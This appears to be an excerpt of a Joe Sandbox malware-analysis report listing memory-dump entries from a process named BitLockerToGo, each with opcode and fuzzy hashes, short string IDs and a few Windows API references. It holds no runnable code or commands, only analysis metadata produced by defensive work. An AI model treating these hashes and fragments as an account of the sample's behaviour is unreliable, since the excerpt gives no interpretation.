                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: V\^R$ZXU^
                                          • API String ID: 0-1847934245
                                          • Opcode ID: f56f4f1707e53735b51b953f3f58deafc2f1644d8431cbb90b018b20c5848001
                                          • Instruction ID: 3489d534edfe2bbead8c4cbdcff6eb6c4d3839711dccf9eaaccd52d13d0805ff
                                          • Opcode Fuzzy Hash: f56f4f1707e53735b51b953f3f58deafc2f1644d8431cbb90b018b20c5848001
                                          • Instruction Fuzzy Hash: 9811E67050C3A88BC3E19F95829072EBFE1AB4AB09F140D5CF6D497222C739C914CF92
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: DrivesLogical
                                          • String ID:
                                          • API String ID: 999431828-0
                                          • Opcode ID: de11472c7b0f7531d577b868fd39624dda65cfcf1f554283c3bd5cc296b5c525
                                          • Instruction ID: 51848c34a992149c340a654780a723a5fd2b42b46b52e3872a15077697fbf6cc
                                          • Opcode Fuzzy Hash: de11472c7b0f7531d577b868fd39624dda65cfcf1f554283c3bd5cc296b5c525
                                          • Instruction Fuzzy Hash: 0C0230B4508341ABD310EF54E980A2FBBF5AF86B48F504D1CF6859B241E778D909CBA7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: f
                                          • API String ID: 0-1993550816
                                          • Opcode ID: 29b19267a4c10ea651798e4733cb967488374e2665c3e9d8717cf2dad591559d
                                          • Instruction ID: 41bd511d8e945a62d0373d46f07106343b1e3c64e657760af32fbac1e2138b3d
                                          • Opcode Fuzzy Hash: 29b19267a4c10ea651798e4733cb967488374e2665c3e9d8717cf2dad591559d
                                          • Instruction Fuzzy Hash: 4E22AE716083419FC715CF18C880B2ABBE6FBC9318F588AADF89597391E735D944CB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %1.17g
                                          • API String ID: 0-1551345525
                                          • Opcode ID: 00fd2001c28099dd8ca6b184e037cb03a1cd2364cf1eb5edba79a118be62a25a
                                          • Instruction ID: 853484c832217e6e581be79b0aa9b50cb0a8facde42b08d99d20af16105b80e3
                                          • Opcode Fuzzy Hash: 00fd2001c28099dd8ca6b184e037cb03a1cd2364cf1eb5edba79a118be62a25a
                                          • Instruction Fuzzy Hash: 5912E5B5E083418BE7258F18C480327BBE3AFA1219F8D856DD89B4B351EB71D849C782
                                          APIs
                                          • CoCreateInstance.OLE32(02B1CB80,00000000,00000001,02B1CB70), ref: 02AF5759
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: CreateInstance
                                          • String ID:
                                          • API String ID: 542301482-0
                                          • Opcode ID: ca704737f74aeb9f96a91bae473765fca8c18c15fda3338a677fe06f69d1a6f0
                                          • Instruction ID: fc428e003a648d4d67aea7d8e71edaecb24e2b02b89626926839a1989ba6db69
                                          • Opcode Fuzzy Hash: ca704737f74aeb9f96a91bae473765fca8c18c15fda3338a677fe06f69d1a6f0
                                          • Instruction Fuzzy Hash: 716101B1A003049BDB609BA4CCD5B7733B5FF85368F844958FA468B290FB79E805C761
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: "
                                          • API String ID: 0-123907689
                                          • Opcode ID: b4dd1703a906e8b6cd7c082d905e90f367088802436f99157a31f5efb5853097
                                          • Instruction ID: 26c36e1237c5d59532c634707bff269fcff7c6b02452f058366c24ddcee191f9
                                          • Opcode Fuzzy Hash: b4dd1703a906e8b6cd7c082d905e90f367088802436f99157a31f5efb5853097
                                          • Instruction Fuzzy Hash: 54D104B2A083149FD764DFA4C49076BB7E6AB84214F08892DFA95C77C1EF38D905CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .
                                          • API String ID: 0-248832578
                                          • Opcode ID: 1d838065b5ff38f657086b0659bb23ce2eea436b4fb8915cb51e8bfdda7387e0
                                          • Instruction ID: 025f7dfab175b7383fcd06b931f86575649ce83facf3539eb5cfb001bc813722
                                          • Opcode Fuzzy Hash: 1d838065b5ff38f657086b0659bb23ce2eea436b4fb8915cb51e8bfdda7387e0
                                          • Instruction Fuzzy Hash: E2C1EB72A086514BC311CE2DC88075AF7E7AFC5674FA9C65AD4D6CB3A5EB34C841CB81
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0$bc
                                          • API String ID: 0-1834741830
                                          • Opcode ID: 8235265d02dbe8eed7026d1415b47409dd99d273f4370aca787adeeb3badc5e6
                                          • Instruction ID: 08cd741eb3cf080a1c74677ed536b4a06a437d4123d82d8e4285d1a0755cc437
                                          • Opcode Fuzzy Hash: 8235265d02dbe8eed7026d1415b47409dd99d273f4370aca787adeeb3badc5e6
                                          • Instruction Fuzzy Hash: 5CC1CC76A18241CFD714DF28E4A062EF7F1FB8A355F4A88ADD58697340D338E864CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TX&!
                                          • API String ID: 0-2285087643
                                          • Opcode ID: f9ea51afa34290f24f43b14243d852835081549e5528a45ff89f2efe83c40143
                                          • Instruction ID: 95653099383e54d105d8d1f83cd3d5925a4552b129b3264c3a3c66c14d987913
                                          • Opcode Fuzzy Hash: f9ea51afa34290f24f43b14243d852835081549e5528a45ff89f2efe83c40143
                                          • Instruction Fuzzy Hash: 99A1E131A4C390CFD314DF38E0A022AFBE2EB8A251F8989ADE4C587351D73AD855CB51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Q@g`
                                          • API String ID: 0-1164027427
                                          • Opcode ID: 63353699d676fb54fe113b69fc153835dea218d83d2a6366d5da8cb3fccccad0
                                          • Instruction ID: b374a49f598928ce6d1da2a30c6d0952a2e26758c59b761e97713375a4680b9d
                                          • Opcode Fuzzy Hash: 63353699d676fb54fe113b69fc153835dea218d83d2a6366d5da8cb3fccccad0
                                          • Instruction Fuzzy Hash: F0B10775D102298FDB14CF68D8507ADB7B2BF89314F1942A9D909BB382DB34AD41CF90
                                          APIs
                                          • LoadLibraryExW.KERNEL32(09840B71,00000000,00000800), ref: 02B14202
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: b3bfd55d8517a5214fcef722852ac82bdb17ef03a5f4603aae353dc33b01816c
                                          • Instruction ID: 3258a2373cb9281192b59da3c4c5bf433377b27bbf8d83eac442bdefe239d848
                                          • Opcode Fuzzy Hash: b3bfd55d8517a5214fcef722852ac82bdb17ef03a5f4603aae353dc33b01816c
                                          • Instruction Fuzzy Hash: 4411AC749983049FC310EF18D88062ABBF1AB55384F804C2CE5C2D3352D338D968CB52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0$bc
                                          • API String ID: 0-1834741830
                                          • Opcode ID: a2b9482227ec6b729fc5f7e151f16942aea94ecd26b404e7deb0f21fe9f52eb1
                                          • Instruction ID: ee3856fa6e0055021f747f807abbccf69c5871c0a80561029cf05f71f332e7f0
                                          • Opcode Fuzzy Hash: a2b9482227ec6b729fc5f7e151f16942aea94ecd26b404e7deb0f21fe9f52eb1
                                          • Instruction Fuzzy Hash: 7891CA75A08241CFD710DF28E4A0A2EF7F5FB8A345F4A88ADD59597341C339E824CB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %&'
                                          • API String ID: 0-1807952111
                                          • Opcode ID: 54bac8efacd9fd436ad4439d6eb14e1beb79de5f9fb1b08932b0b62315aa3820
                                          • Instruction ID: 13949735b4024b2b691fe44cab7ce3c74e188ffb08fb616b401281dc07cb2f24
                                          • Opcode Fuzzy Hash: 54bac8efacd9fd436ad4439d6eb14e1beb79de5f9fb1b08932b0b62315aa3820
                                          • Instruction Fuzzy Hash: A781BF346087819BC724DF19C8A0A2BB7F5FF89784F8589ACE5C5CB255E731E814CB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,
                                          • API String ID: 0-3772416878
                                          • Opcode ID: 30951a81d57310a59c17924c63e4cfe18df62154c92b1a8a7d92b10507593c8d
                                          • Instruction ID: 3d7435e4121a302207018706fdc524321fb1a857110292fab687b1695be58f31
                                          • Opcode Fuzzy Hash: 30951a81d57310a59c17924c63e4cfe18df62154c92b1a8a7d92b10507593c8d
                                          • Instruction Fuzzy Hash: FDB139712093819FC325CF18C88065BFBE1AFA9704F444E2DE5D997742D631EA18CBA6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0$bc
                                          • API String ID: 0-1834741830
                                          • Opcode ID: b8aeceb616983abcff0ec7fe0cfd6337308e7e6c21416f188314a85d1148242c
                                          • Instruction ID: f985c0e803b189dc7f31c4d023f173d032d333549ef79795b4f913cefe8f2152
                                          • Opcode Fuzzy Hash: b8aeceb616983abcff0ec7fe0cfd6337308e7e6c21416f188314a85d1148242c
                                          • Instruction Fuzzy Hash: 5081C775A18201CFD714DF68E4A0A2EF7F5FB8A385F4A88BDD59593640C338A864CB91
                                          Strings
                                          • 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 02B0584B
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
                                          • API String ID: 0-2471034898
                                          • Opcode ID: fb2b0091a66f1802e143328bb45602f2b87f8ce6554266233c2eef9899ff9531
                                          • Instruction ID: fa04c39b48c449b380ddd6550267e68fb750a6780d9dbb661ac2d1e9eec5bafb
                                          • Opcode Fuzzy Hash: fb2b0091a66f1802e143328bb45602f2b87f8ce6554266233c2eef9899ff9531
                                          • Instruction Fuzzy Hash: 0B613B32B596804BD7368D3C8CD23A96E837F96230B9C8BA9E5B1CB7D1D6259804C751
                                          Strings
                                          • 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 02B073A1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
                                          • API String ID: 0-2471034898
                                          • Opcode ID: fe74ba3baf768966e494d0f843b45be2f19a5c2421b87848fd9061a77d4f1d01
                                          • Instruction ID: a3c78901fee7d202ad5d74a3c0f445ffcae2fb847b533a6e2429f6a78e46bad3
                                          • Opcode Fuzzy Hash: fe74ba3baf768966e494d0f843b45be2f19a5c2421b87848fd9061a77d4f1d01
                                          • Instruction Fuzzy Hash: DB613633E9A59087D326483C4C812A9EE535BD727473EC3E6DCB18B3D1DA269C029391
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: 4`[b
                                          • API String ID: 2994545307-3962175265
                                          • Opcode ID: 8e8eb153df4c8e67d0e3ff1b215814dd36108c8ca08be612a2beac6aa0d9f401
                                          • Instruction ID: 82423cc575954ef20ef0ef30349d08ea7b08d72db2e367185a2dc2336bc3ff48
                                          • Opcode Fuzzy Hash: 8e8eb153df4c8e67d0e3ff1b215814dd36108c8ca08be612a2beac6aa0d9f401
                                          • Instruction Fuzzy Hash: 4551C270A08342ABD722EB58C8D0A2ABFF6EF95345F588C5CE5C5872D1D731D824CB52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %&'
                                          • API String ID: 0-1807952111
                                          • Opcode ID: 15d91d504c069e455ef2087ac3ace83bbbbaf3f2ac626100fecf6a9841814ea9
                                          • Instruction ID: 3193a6ee02df78f0fb1c741534a723f623296e771650394d60c8184e4066bf57
                                          • Opcode Fuzzy Hash: 15d91d504c069e455ef2087ac3ace83bbbbaf3f2ac626100fecf6a9841814ea9
                                          • Instruction Fuzzy Hash: C341CD70D08245DFDB24CF94D980ABFBBB9EF8A305F944899E585A7241D3309854CBA2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: N967
                                          • API String ID: 0-1083447927
                                          • Opcode ID: ea6084bc36f7a24ca9c17baf4a751d60f4f1dceea07d8688cfe3ddb644291ba4
                                          • Instruction ID: 03ea4c0acfa2cc343b91974c183dc4ef2ecaff939c28423b3fbd3b614e1a2629
                                          • Opcode Fuzzy Hash: ea6084bc36f7a24ca9c17baf4a751d60f4f1dceea07d8688cfe3ddb644291ba4
                                          • Instruction Fuzzy Hash: 725120B04083809FD750DF54C480A2BBBF5EF9A798F109A4DF5D48B261E739D944CB96
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %&'
                                          • API String ID: 0-1807952111
                                          • Opcode ID: 07ec1014866716447a808b0ab864283dcc7b085880d8d4d3a4e15dbdda387c88
                                          • Instruction ID: a17e2fba62f73a8144d75d423e611c1346e7cd6b260d9ba2272cf54d5e13aa83
                                          • Opcode Fuzzy Hash: 07ec1014866716447a808b0ab864283dcc7b085880d8d4d3a4e15dbdda387c88
                                          • Instruction Fuzzy Hash: CF41CF34A08380AFD724DE14D8A4B2BB7F6EF85754F94885CF58987241D331E8A4CB52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %&'
                                          • API String ID: 0-1807952111
                                          • Opcode ID: a92cac41bfb6d16bb81a811746cee2a6d2efc4a47fce9fce30cd602c25491317
                                          • Instruction ID: 123510a733786f6a64cc6422509063e862c053db3585420176fd553c613d20c9
                                          • Opcode Fuzzy Hash: a92cac41bfb6d16bb81a811746cee2a6d2efc4a47fce9fce30cd602c25491317
                                          • Instruction Fuzzy Hash: D7418E34648380AFD728DF54D8A0B2BB7F6EF85754FA4886CE5C997281D331E814CB96
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cc28419ac998b853b8f5b7822dddedc2d4859311e267903561888dbf11bfb68d
                                          • Instruction ID: d7134abd5b3c8affedb275c7fde730b80c72580f9288ab35c495772748895189
                                          • Opcode Fuzzy Hash: cc28419ac998b853b8f5b7822dddedc2d4859311e267903561888dbf11bfb68d
                                          • Instruction Fuzzy Hash: 2D42E3325083118BC725DF28E4803BAB3E2FFC4318F59892ED9D797285DB35A955CB92
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bc20f505c08c5bf7c18bb747b06e73417c21ac9efcb617ca73bd31693c2267f3
                                          • Instruction ID: f68e21dcf7638b6cd508930578a0c36b4515215e82fe593ef6b0406cd42c922c
                                          • Opcode Fuzzy Hash: bc20f505c08c5bf7c18bb747b06e73417c21ac9efcb617ca73bd31693c2267f3
                                          • Instruction Fuzzy Hash: 8452B4B09087848FE735CB24C4847A7BBE1EB8131CF165D2DC5EB06B82DB79A585C762
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0ae8be45ecc265ad60dfef65d51db6f81b30ca3366c9e29a2f55b73bdeaccbd7
                                          • Instruction ID: ee956a88745a17ca18db8b7eee9f8a49a7f44a5de040dd1e13017936d76ad3d2
                                          • Opcode Fuzzy Hash: 0ae8be45ecc265ad60dfef65d51db6f81b30ca3366c9e29a2f55b73bdeaccbd7
                                          • Instruction Fuzzy Hash: 9352C0315083458FC719CF29C4D06AAFBE1BF88318F598A6DF89A57351DB34E989CB81
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 10ec9a69b78c6806acb0cdb5177ae1a6a6503a3c9645dd0b53d46a04722d3e6e
                                          • Instruction ID: 671448c00184795ebf7158505f6b213a530c13235294aae3ee522d1fa0470a46
                                          • Opcode Fuzzy Hash: 10ec9a69b78c6806acb0cdb5177ae1a6a6503a3c9645dd0b53d46a04722d3e6e
                                          • Instruction Fuzzy Hash: 9A32F070515B118FC378CF29C99066AFBF2BF45610B905A2ED6A78BB90DB36F845CB10
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f733a2303b137055065734c11e2aad6d49fb20e21a38f9d0682d3bc134183da
                                          • Instruction ID: 5560a27c49c39f14419c75f0f6d03a3a932e613543ea2e906a1370e92042a25f
                                          • Opcode Fuzzy Hash: 4f733a2303b137055065734c11e2aad6d49fb20e21a38f9d0682d3bc134183da
                                          • Instruction Fuzzy Hash: E3F113B18083419FD724CF68C49065BBBE2AF95314F04896DF9D98B392DB39D909CB53
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 899da61d4a4344b3584b10c309c1621e2107f7b3ee253ef316529013dd7b837d
                                          • Instruction ID: ac45ffabc39a331ea02518468fca55bcc1dc5ecf7cd53a37f0e871fd67340b97
                                          • Opcode Fuzzy Hash: 899da61d4a4344b3584b10c309c1621e2107f7b3ee253ef316529013dd7b837d
                                          • Instruction Fuzzy Hash: 24F1CE756483418FC324CF29C88066BFBE2AFC9304F48982DE4CA87752EB75E844CB56
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2582b65c72be482fa3011dd49a3416e748cec85ba580c14030772af78eeddfd8
                                          • Instruction ID: 986e9b3b5e3cb678396402c912cef14f13abec1fff8f14b17d47add28afb59a1
                                          • Opcode Fuzzy Hash: 2582b65c72be482fa3011dd49a3416e748cec85ba580c14030772af78eeddfd8
                                          • Instruction Fuzzy Hash: D3E12732E102558FDB14CF7DC89039DB7A3AF8A330F1983AAE565A72D1D7349D558B80
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 110f068bc06babf526428a8ca7220cffdb511a7bed330cda058068d4026cfc7d
                                          • Instruction ID: 946b2fdad1b309aaf8bb191a28effd7a9a6d5c7ec650c35a37424354671dca36
                                          • Opcode Fuzzy Hash: 110f068bc06babf526428a8ca7220cffdb511a7bed330cda058068d4026cfc7d
                                          • Instruction Fuzzy Hash: ABF18A75A18302CFE708CF24E49179AB7E2FF88359F49896DE84A87280D735E955CF42
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 96e8f705f8ca61067bcfa6f52ba7075ceec16d6c65b95218e4d0edca7134d703
                                          • Instruction ID: 112b442cb5923cd43c0f1e4f3bb39f0063cd608945f332f333b381e2ade09c1e
                                          • Opcode Fuzzy Hash: 96e8f705f8ca61067bcfa6f52ba7075ceec16d6c65b95218e4d0edca7134d703
                                          • Instruction Fuzzy Hash: D1B1D171A083018FD754DF98C8907ABB7E6EF85354F04882CF6C98B252EB39D945CB92
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ca4c3e2d0b56908a93c652a9b695c695113c64ebe812d092e7aa0c4a92822f58
                                          • Instruction ID: 27addbe4ee668b57744efa67e6133777ae7007414fd05bc1572eab4ba3e5deae
                                          • Opcode Fuzzy Hash: ca4c3e2d0b56908a93c652a9b695c695113c64ebe812d092e7aa0c4a92822f58
                                          • Instruction Fuzzy Hash: DAC11776A58311CFC728CF28D49126AB7E6FB89354F0A4EADD895C3381D738D958CB81
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ab3dc222790e29fffafe299cbd21ddc32123f3c8370b7502b5ae34384ed8a2b8
                                          • Instruction ID: 84f12ec1465e87562f6faedd70a8f2c9b7e2f80f856a72fbae5cf652296af05e
                                          • Opcode Fuzzy Hash: ab3dc222790e29fffafe299cbd21ddc32123f3c8370b7502b5ae34384ed8a2b8
                                          • Instruction Fuzzy Hash: EAB18A716082419FD304EF28E590A2EFBE2FF8A305F598DADE4D583251D735E824CB92
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7805861dcd186361dfe2ebe0cbac01867076507d20abb4575bc8bd1e16d54128
                                          • Instruction ID: 11d0dbee2ff57b99d9ce7238ee78d72c31f888e8b5dab937b5819ce38b7f2b5c
